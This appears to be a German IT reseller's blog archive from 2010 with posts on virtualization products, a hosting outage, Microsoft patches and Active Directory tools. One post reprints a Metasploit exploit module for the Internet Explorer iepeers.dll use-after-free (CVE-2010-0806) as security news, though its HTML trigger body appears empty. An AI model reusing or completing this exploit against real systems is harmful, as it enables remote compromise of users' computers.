VMware und Partition Alignement

Eine sehr gute Anleitung für VMware ESX (v3) findet man hier:

http://www.vmware.com/pdf/esx3_partition_align.pdf

Wo ist die Hosts Datei auf Windows 64bit ?

Für alle, die die Hosts-Datei auf Windows 64bit suchen oder gesucht haben, oder die wissen wollen, was der Unterschied zwischen den Programmordnern Programme (x86) und  Programme ist, gibt es hier eine Antwort:
Where is the Hosts File on Windows x64? | sepago

Unsere Webseiten waren am 15.04. 16:17-18:12 Uhr kurzzeitig nicht erreichbar!

Domainfactory, unser Hoster, hat durch ein Softwareupgrade einen kurzzeitigen Ausfall unserer Webseite verursacht. Es wird mit Hochruck an einer Lösung gearbeitet, um die Webserver wieder online zu bekommen.

Wir bitten alle unsere Kunden und Interessenten für die entstandenen Unannehhmlichkeiten um Verzeihung!

15.04.10: 18:12 Uhr
Unsere Webserver stehen wieder wie gewohnt zur Verfügung!
__________________________________________________________________________________

Originalmitteilung unseres Hosters:

Ausfall von mehreren Webservern

Ticket eröffnet:

15.04.10, 16:17 Uhr
Aufgrund eines technischen Problems sind derzeit mehrere Webserver nicht verfügbar. Unsere Techniker arbeiten bereits mit Hochdruck an der Problemlösung.

Ein aktualisierter Status wird in wenigen Minuten, nach Identifizierung der jeweils nicht verfügbaren Webserver, bereitgestellt.

Wir bedauern diese Beeinträchtigung und entschuldigen uns für die Unannehmlichkeiten.

[Update 15.04.2010 16:31]
Aktuell sind ein Grossteil der  Server nicht zu erreichen. Wir arbeiten bereits intensiv an einer Lösung der Situation. Sobald wir neue Erkenntnisse haben werden wir Sie schnellstmöglich hier informieren.


[Update 15.04.2010 16:35]
Die Erreichbarkeitsproblematik ist durch ein Softwareupgrade entstanden. Aktuell wird der Umfang des Upgrades geprüft und rückgängig gemacht.

[Update 15.04.2010 16:45]
Aktuell wird auf den betroffenen Servern das Softwareupdate rückgängig gemacht.

[Update 15.04.2010 17:13]
Die Server werden aktuell manuell geprüft und stehen nach der Überprüfung wieder wie gewohnt zur Verfügung. Auf Grund des Umfangs der Störung und der damit verbundenen manuellen Prüfung können wir momentan leider noch keine Server direkt bezeichnen.

Wir gehen momentan davon aus das in 30-60 Minuten alle Server wieder zur Verfügung stehen.

[Update 15.04.2010 17:26]
Die Server kommen nach und nach wieder online und stehen wieder wie gewohnt zur Verfügung. Wir halten Sie hier weiterhin auf dem aktuellen Stand.

[Update 15.04.2010 17:43]
Die Technik arbeitet weiterhin intensiv daran, alle Server schnellstmöglich zur Verfügung zu stellen.

[Update 15.04.2010 18:11]
Alle Server stehen in Kürze wieder wie gewohnt zur Verfügung.

[Update 15.04.2010 18:26]
Alle Server stehen wieder wie gewohnt zur Verfügung.

Wir bedauern die Beeinträchtigungen und entschuldigen uns für die entstandenen Unannehmlichkeiten.

Version 3.0 von Pano Logic's Desktopvirtualisierung

Mit dem heutigen Major-Release der neuen Softwareversion 3.0 ist dem kalifornischen Hersteller Pano Logic ein großer Wurf gelungen. Es sind viele neue sowie stark verbesserte Funktionen hinzugekommen, darunter:

• Unterstützung von Windows 7: Alle Editionen ab Windows 7 Professional x86 (32 bit) werden unterstützt
• Mehrere Desktops pro Benutzer: Bessere Kontrolle und Verwaltung von nahezu beliebig vielen Desktops pro Benutzer für unterschiedliche Funktionen (Abb. 3)
• Pano Manager Failover: Zwei Pano Manager Virtual Aplliances lassen sich in einem active/passive Failover Cluster betreiben (Abb. 4)
• Verbesserter Logicscreen, welcher den Benutzern mehr Informationen und Optionen zur Auswahl bietet (Abb. 2)
• Verbesserte Administration: Neu hinzugekommen ist unter anderem ein (Zustands-) Management für DVMs, welche sich im Maintenance-Mode befinden
• Noch bessere und nahtlosere Integration von VMware vSphere 4.0 U1 und View 4.0

Der Download der neuen Version 3.0 ist ab sofort freigegeben: Unsere Kunden mit gültigem Maintenance-Vertrag können die Software von unseren Servern herunterladen!

 

  Abb 2. Bessere Kontrolle durch Benutzer: Der stark verbesserte Loginscreen

Abb. 3 Mehrere Desktops (DVMs) pro Benutzer

Abb. 4 Pano Manager Failover Gruppen bieten mehr Sicherheit durch Redundanz

CNN Money: Pano's Zero-Client "real-world" Bericht

Heute ist ein schöner Bericht über Pano Logic's Zero-Client bei TechTalk at CNN Money online erschienen:

IE 0-day exploit code veröffentlicht

Dem israelischen Hacker Moshe Ben Abu ist es gelungen, auf Grund von Hinweisen eines McAfee Blogposts eine Sicherheitslücke im Microsoft Internet Explorer auszunutzen: Der Exploitcode wurde bereits veröffentlicht: http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb

Betroffene Versionen: IE 6 und 7

Ganze Story (Englisch): http://blogs.zdnet.com/security/?p=5666&tag=trunk;content

Und hier der Code:

##
# ie_iepeers_pointer.rb
#
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
#
# Tested successfully on the following platforms:
#  - Microsoft Internet Explorer 7, Windows Vista SP2
#  - Microsoft Internet Explorer 7, Windows XP SP3
#  - Microsoft Internet Explorer 6, Windows XP SP3
#
# Exploit found in-the-wild. For additional details:
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
#
# Trancer
# http://www.rec-sec.com
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking

 include Msf::Exploit::Remote::HttpServer::HTML

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Microsoft Internet Explorer iepeers.dll use-after-free',
   'Description'    => %q{
    This module exploits a use-after-free vulnerability within iepeers.dll of 
    Microsoft Internet Explorer versions 6 and 7.
    
    NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
   },
   'License'        => MSF_LICENSE,
   'Author'         => [ 
      'Trancer '
      ], 
   'Version'        => '$Revision:$',
   'References'     =>
    [
     [ 'CVE', '2010-0806' ],
     [ 'OSVDB', '62810' ],
     [ 'BID', '38615' ],
     [ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
     [ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
     'InitialAutoRunScript' => 'migrate -f',
    },
   'Payload'        =>
    {
     'Space'         => 1024,
     'BadChars'      => "\x00\x09\x0a\x0d'\\", 
     'StackAdjustment' => -3500,
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] 
    ],
   'DisclosureDate' => 'Mar 09 2010',
   'DefaultTarget'  => 0))
 end

 def on_request_uri(cli, request)
  
  # Re-generate the payload
  return if ((p = regenerate_payload(cli)) == nil)

  # Encode the shellcode
  shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

  # Set the return\nops
  ret     = Rex::Text.to_unescape([target.ret].pack('V'))

  # Randomize the javascript variable names
   j_shellcode  = rand_text_alpha(rand(100) + 1)
  j_nops   = rand_text_alpha(rand(100) + 1)
  j_slackspace = rand_text_alpha(rand(100) + 1)
  j_fillblock  = rand_text_alpha(rand(100) + 1)
  j_memory  = rand_text_alpha(rand(100) + 1)
  j_counter  = rand_text_alpha(rand(30) + 2)
  j_ret   = rand_text_alpha(rand(100) + 1)
  j_array   = rand_text_alpha(rand(100) + 1)
  j_function1  = rand_text_alpha(rand(100) + 1)
  j_function2  = rand_text_alpha(rand(100) + 1)
  j_object  = rand_text_alpha(rand(100) + 1)
  j_id   = rand_text_alpha(rand(100) + 1)

  # Build out the message
  html = %Q|

|

  print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

  # Transmit the compressed response to the client
  send_response(cli, html, { 'Content-Type' => 'text/html' })
  
  # Handle the payload
  handler(cli)

 end

end

Dell Precision Mobile Workstation M6500 Update

Bereits kurz vor der CeBIT war zu erfahren, dass die leistungsfähiste mobile Workstation, die wir gestestet haben, die Dell Precision M6500 Ende April ein Update erfährt:

USB3.0 ist ja bereits an Bord, neu hinzukommen wird die Möglichkeit, zwei Festplatten (RAID 0 oder 1) mit einer zusätzlichen SSD über einen integrierten RAID-Controller zu kombinieren: Man hat dann insgesamt drei "Festplatten" zur Verfügung, und kann damit sogar ein RAID 5 betreiben - bislang die einzige mobile Workstation mit RAID 5! Bislang waren "nur" RAIDs mit den beiden internen Festplatten möglich. Das SSD-Device kann typischerweise als Bootdevice und/oder Systempartition fürs Betriebssystem genutzt werden und kann je nach Anwendung zu einem deutlichen Performanceboost führen.

28.03. Update: Die Variante mit 3 "Festplatten" (RAID 5) lässt sich ab sofort bestellen!

Admins: Microsoft März Patchday

Wie jeden 2. Dienstag des Monats veröffentlichte Microsoft am 09.03.2010 Patches für MS Software. Diesen Monat waren 8 Patches dabei, wie folgende Übersicht zeigt - Details zu den veröffentlichten Updates hier.  Das Update kann Sie mit der in Windows integrierten Update-Funktion installiert werden.

Bulletin	Titel	Anzahl der Lücken / Bewertung / Eigenschaften	Betroffene Software
MS10-016	Sicherheitsanfälligkeit in Windows Movie Maker kann Remotecodeausführung ermöglichen (975561)	1 / hoch / Remote-Codeausführung	Windows XP, Windows 2000, Server 2003
MS10-017	Sicherheitsanfälligkeiten in Microsoft Office Excel können Remotecodeausführung ermöglichen (980150)	7 / hoch / Remote-Codeausführung	Microsoft Excel 2002 SP3, Excel 2003 SP3, Excel 2007 SP1/SP2

ZDNet (UK): Pano Logic erhält die Bewertung "sehr gut"

Das bekannte IT-Portal ZD.Net bewertet die Pano Zero-CLient Lösung zur Desktopvirtualisierung mit "sehr gut" ("very good").

Das Urteil der Testredaktion lautet: "Eine hervorragende Wahl für die Desktop-Virtualisierung im Unternehmensmaßstab stellt das Pano-System dar, welches aus einem "zero-footprint" Thinclient (Zero-Client), einem Connectionbroker und einer Remote-Access-Lösung (Pano-Remote) für mobile Mitarbeiter besteht."

Im Original heißt es:

7.5

Editors' Rating    VERY GOOD

Typical price:£ 1899

Verdict

An excellent choice for enterprise-scale virtual desktop deployments, Pano System includes a zero-footprint thin client, a connection broker and remote-access server software... Read Full Review.

Pros

• Smallest, lowest-power thin client we've seen
• Minimal workload for system administrators
• Straightforward for end-users

Cons

• Only works with Windows XP virtual desktops
• Remote users outside the firewall must have a Windows PC
• Not suitable for multimedia applications

Key Specs

Dimensions (W x H x D):	8.88x5.1x8.88 cm
Weight:	0.5 kg

Neu in unserem Programm: FalconStor und Nexsan

Falconstor zeigt neues »FDS 2.0« auf der CeBIT

Der Storage-Softwarespezialist FalconStor Software präsentiert Version 2.0 des »File-Interface Deduplication System« (FDS) mit LAN-basierter Deduplizierung der Unternehmensklasse und Hochverfügbarkeit. Dies war der Schwerpunkt des Messeauftritts auf der CeBIT (2. bis 6. März 2010).
Des weiteren präsentierte Falconstor alle aktuellen Lösungen aus dem Virtualisierungs- und Datenschutz-Produktportfolio in Hannover: Neben dem brandneuen FDS 2.0 sind dies »Network Storage Server« (NSS), »Virtual Appliance HyperTrac Backup Accelerator« für »VMware Consolidated Backup«, NSS- und NSS-Virtual-Appliance sowie die »NSS HC Series«-SAN-Appliance.

Das neue FDS 2.0 ist für kleine bis mittelgroße sowie für große Unternehmen ausgelegt, die Speicherplatz und -kosten reduzieren möchten, indem Daten effizienter auf Festplatten geschrieben werden. Durch die neu eingeführte Hochverfügbarkeit behalten Unternehmen jeder Größe den Zugriff auf ihre gesicherten Daten, wobei laut Falconstor gewährleistet ist, dass Backups stets innerhalb kurzer Backup-Fenster durchgeführt werden können – was besonders wichtig für Datenbanken ist, auf denen das ERP, das CRM oder andere wichtige Applikationen des Unternehmens laufen.

Unterstützt »Symantec OpenStorage« (OST)
Weitere Funktionen in FDS 2.0 sind unter anderem eine Unterstützung für »Symantec OpenStorage« (OST); dadurch ergeben sich 5,4 TByte pro Stunde Durchsatz an Backup-Daten und eine Ingest-Rate von 1,5 GByte/s über zwei 10-Gigabit-Ethernet-Verbindungen für die doppelte Leistung. Durch ein verbessertes Fan-in-Verhältnis von 150 zu 1 sollen verteilte Umgebungen besser unterstützt und der Bereich der globalen Deduplizierung verbessert werden. Verbessert wurde auch das Replikations-Dashboard für eine Überwachung in Echtzeit.

Als erster Falconstor-Technologie-Partner nimmt Nexsan die neue Version in sein Storage-Angebot auf und integriert die Lösung in die »DeDupe SG 2.0«-Familie von Deduplizierungs-Appliances.

Ab sofort erhalten Sie sämtliche FalconStor und Nexsan Produkte bei uns!

Fujitsu Zero-Client Monitor

Mit dem D602 präsentiert auf der diesjährigen CeBIT nun auch Fujitsu einen echten Zero-Client. Dabei beruht die verwendete Technologie vollständig auf der Zero-Client Technologie des US-Herstellers Pano Logic, Inc., dessen Solution Partner wir bereits als eines der ersten europäischen Systemhäuser von erster Stunde an sind.

 

Fujitsus Zero-Client ist letzten Endes ein intelligenter Monitor, der quasi direkt an den Server angeschlossen wird und somit einen kompletten PC-Arbeitsplatz darstellt. Er braucht prinzipiell nur zwei Kabel: Strom und Ethernet, damit die Informationen von und zur Arbeitsstation übertragen werden können. Maus und Tastatur können an den Monitor angeschlossen werden.

(C) 2010 Fujitsu

Der Monitor des Zero-Clients D602 ist ein 22-Zoll-TFT mit einer nativen Auflösung von 1.680 x 1.050 Pixeln, bietet einen Einblickwinkel von 170 Grad und ist 250 cd/qm hell. Für Peripherie gibt es drei USB-Anschlüsse und einen Stereoausgang.

Der Zero-Client D602 soll bereits im Ende März/Anfang März 2010 verfügbar sein und ca. 449 Euro kosten.

Zukünftige Versionen des Zero-Clients sollen sogar ganz ohne Stromkabel auskommen. Stattdessen kommt der Strom über das Netzwerkkabel zum Gerät. Power over Ethernet  (IEEE 802.03af) liefert ca. 15 Watt über das Netzwerkkabel. 

Da das Gerät vollständig auf der Pano-Technologie beruht und vom Pano-Management-Server gesteuert wird, ist es möglich, die Geräte mit Pano Zero-Clients in einer gemischten Umgebung zu betreiben!

Siehe auch: http://www.firmenpresse.de/pressinfo167258.html

                  http://virtualization.sys-con.com/node/1304177

SAN Performance Booster von Violin Memory / FalconStor

Der Enterprise-SSD Hersteller Violin Memory hat mit seinem Modell 1010 eine bis zu 4 TB großen Flash-Speicherappliance auf der CeBIT präsentiert, der eine kontinuierlich hohe Performance mit einer niedrigen Latenzzeit von weniger als 100 µs und eine hohe Betriebsbereitschaft bietet (durch automatisches Active Sparing und Hot-Swap-Fähigkeit der Flash-Module).

Auf dem Stand von FalconStor wurde die bald auch von FalcoStor unter dem Namen FalconStor NSS SAN Accelerator Appliance (bauglich mit der Violin 1010) vertriebene Lösung vorgeführt, welche auf zum Patent angemeldeten Flash-RAID-Algorithmen basiert. Er bietet für Enterprise-Anwendungen eine hohe Performance und Zuverlässigkeit zu einem günstigeren Preis als bei herkömmlichen hochleistungsfähigen Speichersystemen mit Halbleiterfestplatten (Solid State Disks - SSD).
Um beispielsweise einen Leistungsgewinn von 100 Prozent zu erzielen, ist der FalconStor NSS SAN Accelerator in Verbindung mit einer Solid State Disk über dreimal günstiger als im Vergleich zu einem SAN Upgrade mit zusätzlichen Disk-Systemen.
Der FalconStor NSS SAN Accelerator ist voraussichtlich ab Mai 2010 zu einem Listenpreis von 25.600 Euro erhältlich. In diesem Preis ist ein RAID-geschützter Solid-State-Speicherarray mit 500 Gigabyte Speicherkapazität bereits enthalten.

VMware Workstation 7.0.1 Update

VMware hat vor kurzem die Version 7.0.1 seines Programms Workstation zur Desktop-Virtualisierung veröffentlicht. Die neue Version unterstützt nun auch offiziell Windows Server 2008 R2 sowohl als Client als auch als Hostsystem, behebt eine Menge Bugs, und bringt einen deutlichen Performancegewinn.

Details gibt es hier: http://www.vmware.com/support/ws7/doc/releasenotes_ws701.html

FastSCP von Veeam in neuer Version erschienen

Veeam hat vor wenigen Tagen ein Update zu seinem beliebten Programm FastSCP veröffentlicht: Version 3.0.2 ist am 15.02. erschienen. Das kostenlose Programm, welches einen schnellen Datentransfer zwischen einem Client und einem ESX-Host herstellt, unterstützt nun auch Windows Server 2008 R2 und Windows 7.

IE Patchen!

Es soll Admins geben, die immer noch nicht den am 22.01.2010 veröffentlichten IE-Patch von Microsoft eingespielt haben. Wir haben es mit den eigenen Augen gesehen, also:

Schnell nachholen: Windows Update aufrufen und nach "MS10-002, KB 978207" suchen und installieren bzw. ausrollen!

Nein, Windows Server 2008 R2 hat nichts mit dem Automobilclub ADAC zu tun...

wohl aber mit dem neu eingeführten Microsoft ADAC! Aber ADAC steht hier für Active Directory Administrative Center, einem brandneuen Verwaltungstool der mit Windows Server 2008 R2 veröffentlicht wurde und eine GUI für die 73 AD-bezogenen PowerShell "Commandlets" (kurz: cmdlets genannt) darstellt. Mit R2 wurden unter anderem eine Vielzahl von neuen Features für Active Directory (AD) präsentiert. Und man kann man sagen, dass die Unterstützung von PowerShell-Scripts in AD beim R2 eine der wichtigsten Neuerungen darstellt!
Bitte nicht mit dem inwischen schon gut angestaubten ADUC (Active Directory Users and Computers) MMC-SnapIn verwechseln, zu dem durchaus eine gewisse optische Ähnlichkeit besteht, aber unter der Haube hat dieses nichts mit dem neuen ADAC zu tun. Denn mit PowerShell 2.0, welches in R2 enthalten ist, kam die neue Möglichkeit auf, GUI basierte PowerSehll Tools zu erzeugen, und ADAC ist eben eines der ersten jener Tools.

Da viele Administratoren Ihre Domaincontroller (DC) noch nicht auf R2 umgestellt haben, stellt sich die Frage, wie man in den Genuß der neuen Features kommt ohne ein Update auf dem Produktivsystemen durchzuführen, geht das überhaupt? - Das erfreuliche ist, dass die Antwort ja lautet, und zwar für Netzwerke mit DCs die bis zu Server 2003 zurückreichen können.

Sie benötigen hierfür aber entweder einen Server 2008 R2 oder eine Installation von Windows 7 (in der Geschmacksrichtung Enterprise, Professional oder Ultimate) in der Domäne: Für Windows 7 laden Sie sich die "Remoteserver-Verwaltungstools für Windows 7" herunter, die es unter folgendem Link gibt:


http://www.microsoft.com/downloads/details.aspx?FamilyID=7d2f6ad7-656b-4313-a005-4e344e43997d&displaylang=de

Eine Beschreibung der Remoteserver-Verwaltungsprogramme für Windows 7 finden Sie hier: http://support.microsoft.com/kb/974877/de

Auf dem Server ( > Win2k3 SP2, also 2k3 R2 SP2, 2k8 etc.) müssen hierzu noch die "Active Directory-Verwaltungsgatewaydienste (Active Directory-Webdienst für Windows Server 2003 und Windows Server 2008)" installiert werden: Wie das geht und Downloadlinks gibt es hier:
http://www.microsoft.com/downloads/details.aspx?displaylang=de&FamilyID=008940c6-0296-4597-be3e-1d24c1cf0dda

Viel Spaß beim Ausprobieren, wir werden in Kürze Beispiele für (PowerShell) AD-Befehle an dieser Stelle veröffentlichen!